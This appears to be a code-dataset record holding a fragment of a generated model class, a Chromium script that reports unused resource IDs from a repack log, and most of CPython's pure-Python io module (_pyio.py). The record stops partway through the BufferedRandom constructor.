result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
TeslaProject/external_chromium_org
|
refs/heads/lp5.1
|
tools/resources/list_resources_removed_by_repack.py
|
95
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
usage = """%s BUILDTYPE BUILDDIR
BUILDTYPE: either chromium or chrome.
BUILDDIR: The path to the output directory. e.g. relpath/to/out/Release
Prints out (to stdout) the sorted list of resource ids that are marked as
unused during the repacking process in the given build log (via stdin).
Additionally, attempt to print out the name of the resource and the generated
header file that contains the resource.
This script is used to print the list of resources that are not used so that
developers will notice and fix their .grd files.
"""
def GetResourceIdsFromRepackMessage(in_data):
"""Returns sorted set of resource ids that are not used from in_data.
"""
unused_resources = set()
unused_pattern = re.compile(
'RePackFromDataPackStrings Removed Key: (?P<resource_id>[0-9]+)')
for line in in_data:
match = unused_pattern.match(line)
if match:
resource_id = int(match.group('resource_id'))
unused_resources.add(resource_id)
return sorted(unused_resources)
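# Example of the log lines matched above (illustrative):
#   "RePackFromDataPackStrings Removed Key: 12345"
# GetResourceIdsFromRepackMessage(['RePackFromDataPackStrings Removed Key: 2',
#                                  'RePackFromDataPackStrings Removed Key: 1'])
# would return [1, 2].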
def Main():
if len(sys.argv) != 3:
sys.stderr.write(usage % sys.argv[0])
return 1
build_type = sys.argv[1]
build_dir = sys.argv[2]
if build_type not in ('chromium', 'chrome'):
sys.stderr.write(usage % sys.argv[0])
return 1
generated_output_dir = os.path.join(build_dir, 'gen')
if not os.path.exists(generated_output_dir):
sys.stderr.write('Cannot find gen dir %s' % generated_output_dir)
return 1
if build_type == 'chromium':
excluded_header = 'google_chrome_strings.h'
else:
excluded_header = 'chromium_strings.h'
data_files = []
for root, dirs, files in os.walk(generated_output_dir):
if os.path.basename(root) != 'grit':
continue
header_files = [header for header in files if header.endswith('.h')]
if excluded_header in header_files:
header_files.remove(excluded_header)
data_files.extend([os.path.join(root, header) for header in header_files])
resource_id_to_name_file_map = {}
resource_pattern = re.compile('#define (?P<resource_name>[A-Z0-9_]+).* '
'(?P<resource_id>[0-9]+)$')
for f in data_files:
data = open(f).read()
for line in data.splitlines():
match = resource_pattern.match(line)
if match:
resource_id = int(match.group('resource_id'))
resource_name = match.group('resource_name')
if resource_id in resource_id_to_name_file_map:
print 'Duplicate:', resource_id
print (resource_name, f)
print resource_id_to_name_file_map[resource_id]
raise
resource_id_to_name_file_map[resource_id] = (resource_name, f)
unused_resources = GetResourceIdsFromRepackMessage(sys.stdin)
for resource_id in unused_resources:
if resource_id not in resource_id_to_name_file_map:
print 'WARNING: Unknown resource id', resource_id
continue
(resource_name, filename) = resource_id_to_name_file_map[resource_id]
sys.stdout.write('%d: %s in %s\n' % (resource_id, resource_name, filename))
return 0
if __name__ == '__main__':
sys.exit(Main())
|
jcoady9/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/_pyio.py
|
45
|
"""
Python implementation of the io module.
"""
import os
import abc
import codecs
import warnings
# Import _thread instead of threading to reduce startup cost
try:
from _thread import allocate_lock as Lock
except ImportError:
from _dummy_thread import allocate_lock as Lock
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
from errno import EINTR
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't
# want to inherit the C implementations.
class BlockingIOError(IOError):
"""Exception raised when I/O would block on a non-blocking I/O stream."""
def __init__(self, errno, strerror, characters_written=0):
super().__init__(errno, strerror)
if not isinstance(characters_written, int):
raise TypeError("characters_written must be a integer")
self.characters_written = characters_written
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True):
r"""Open file and return a stream. Raise IOError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file
is opened. It defaults to 'r' which means open for reading in text
mode. Other common values are 'w' for writing (truncating the file if
it already exists), and 'a' for appending (which on some Unix systems,
means that all writes append to the end of the file regardless of the
current seek position). In text mode, if encoding is not specified the
encoding used is platform dependent. (For reading and writing raw
bytes use binary mode and leave encoding unspecified.) The available
modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (for backwards compatibility; unneeded
for new code)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
    closefd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("arwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if writing or appending:
raise ValueError("can't use U and writing mode at once")
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
raw = FileIO(file,
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd)
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (os.error, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return raw
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
if binary:
return buffer
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
text.mode = mode
return text
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pythonrun.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(ValueError, IOError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read, readinto, or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. bytearrays are accepted too, and in some cases (such as
readinto) needed. Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise IOError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
    with open('spam.txt', 'w') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an IOError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset offset. offset is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
self.flush()
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise UnsupportedOperation.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise UnsupportedOperation.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise UnsupportedOperation.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise an ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An IOError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, limit=-1):
r"""Read and return a line of bytes from the stream.
If limit is specified, at most limit bytes will be read.
Limit should be an int.
The line terminator is always b'\n' for binary files; for text
        files, the newline argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if limit >= 0:
n = min(n, limit)
return n
else:
def nreadahead():
return 1
if limit is None:
limit = -1
elif not isinstance(limit, int):
raise TypeError("limit must be an integer")
res = bytearray()
while limit < 0 or len(res) < limit:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
self._checkClosed()
for line in lines:
self.write(line)
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
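    # Minimal illustrative subclass (not part of the original source): a raw
    # stream that always reads zero bytes, implementing only readinto() so that
    # the generic read(n) below works unchanged.
    #
    #   class ZeroRawIO(RawIOBase):
    #       def readable(self):
    #           return True
    #       def readinto(self, b):
    #           for i in range(len(b)):
    #               b[i] = 0
    #           return len(b)
    #
    #   ZeroRawIO().read(4)   # -> b'\x00\x00\x00\x00'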
def read(self, n=-1):
"""Read and return up to n bytes, where n is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if n is None:
n = -1
if n < 0:
return self.readall()
b = bytearray(n.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read up to len(b) bytes into bytearray b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than len(b).
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, n=None):
"""Read and return up to n bytes, where n is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, n=None):
"""Read up to n bytes with at most one read() system call,
where n is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read up to len(b) bytes into bytearray b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
# XXX This ought to work with anything that supports the buffer API
data = self.read(len(b))
n = len(data)
try:
b[:n] = data
except TypeError as err:
import array
if not isinstance(b, array.array):
raise err
b[:n] = array.array('b', data)
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is never less than
len(b).
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise IOError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise IOError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush of closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
self.flush()
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
def readable(self):
return self.raw.readable()
def writable(self):
return self.raw.writable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError("can not serialize a '{0}' object"
.format(self.__class__.__name__))
def __repr__(self):
clsname = self.__class__.__name__
try:
name = self.name
except AttributeError:
return "<_pyio.{0}>".format(clsname)
else:
return "<_pyio.{0} name={1!r}>".format(clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
return memoryview(self._buffer)
def read(self, n=None):
if self.closed:
raise ValueError("read from closed file")
if n is None:
n = -1
if n < 0:
n = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + n)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, n):
"""This is the same as read.
"""
return self.read(n)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
n = len(b)
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("invalid whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
return True
def writable(self):
return True
def seekable(self):
return True
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
    A buffer for a readable, sequential RawIOBase object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise IOError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, n=None):
"""Read n bytes.
Returns exactly n bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If n is negative, read until EOF or until read() would
block.
"""
if n is not None and n < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(n)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
try:
chunk = self.raw.read()
except IOError as e:
if e.errno != EINTR:
raise
continue
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
try:
chunk = self.raw.read(wanted)
except IOError as e:
if e.errno != EINTR:
raise
continue
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
        # n is more than avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, n=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(n)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
while True:
try:
current = self.raw.read(to_read)
except IOError as e:
if e.errno != EINTR:
raise
continue
break
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, n):
"""Reads up to n bytes, with at most one read() system call."""
# Returns up to n bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if n < 0:
raise ValueError("number of bytes to read must be positive")
if n == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(n, len(self._read_buf) - self._read_pos))
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
_warning_stack_offset = 2
def __init__(self, raw,
buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
if not raw.writable():
raise IOError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
if max_buffer_size is not None:
warnings.warn("max_buffer_size is deprecated", DeprecationWarning,
self._warning_stack_offset)
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer
try:
self._flush_unlocked()
except BlockingIOError as e:
# We can't accept anything else.
# XXX Why not just let the exception pass through?
raise BlockingIOError(e.errno, e.strerror, 0)
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush of closed file")
written = 0
try:
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except IOError as e:
if e.errno != EINTR:
raise
continue
if n > len(self._write_buf) or n < 0:
raise IOError("write() returned incorrect number of bytes")
del self._write_buf[:n]
written += n
except BlockingIOError as e:
n = e.characters_written
del self._write_buf[:n]
written += n
raise BlockingIOError(e.errno, e.strerror, written)
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer,
buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
"""Constructor.
The arguments are two RawIO instances.
"""
if max_buffer_size is not None:
warnings.warn("max_buffer_size is deprecated", DeprecationWarning, 2)
if not reader.readable():
raise IOError('"reader" argument must be readable.')
if not writer.writable():
raise IOError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, n=None):
if n is None:
n = -1
return self.reader.read(n)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, n=0):
return self.reader.peek(n)
def read1(self, n):
return self.reader.read1(n)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
self.writer.close()
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
_warning_stack_offset = 3
def __init__(self, raw,
